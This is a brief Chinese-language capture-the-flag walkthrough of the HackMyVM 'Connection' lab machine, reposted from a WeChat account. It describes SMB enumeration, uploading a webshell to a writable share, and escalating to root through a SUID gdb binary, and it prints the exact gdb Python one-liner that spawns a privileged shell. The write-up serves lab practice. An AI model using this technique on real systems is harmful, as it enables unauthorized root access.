hackmyvm-connection-wp
Connection
扫描发现22,80,139,445端口,网页内容如下
网页没有任何发现,因此思路就只有2个点,一个是直接爆破22,一个是打445。445可能性更大,Linux版本下的smb有个is_known_pipename的攻击手法,又名sambacry,和永恒之蓝是同一批的漏洞。
攻击失败了,但是smbmap扫描的时候发现了share文件夹存在,文件夹只读
[ ] Detected 1 hosts serving SMB[ ] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 192.168.69.9:445 Name: CONNECTION Status: NULL Session Disk Permissions Comment
share READ ONLY print$ NO ACCESS Printer Drivers IPC$ NO ACCESS IPC Service (Private Share for uploading files) [*] Closed 1 connections
直接windows访问是不通的,得要smbclient访问
传个webshell进去,获得flag1
suid搜一下,有个gdb不太常规
提权方法是
gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
先python生成tty
然后suid提权,成功提权到root,完毕
原文始发于微信公众号(BlueIris):hackmyvm-connection-wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论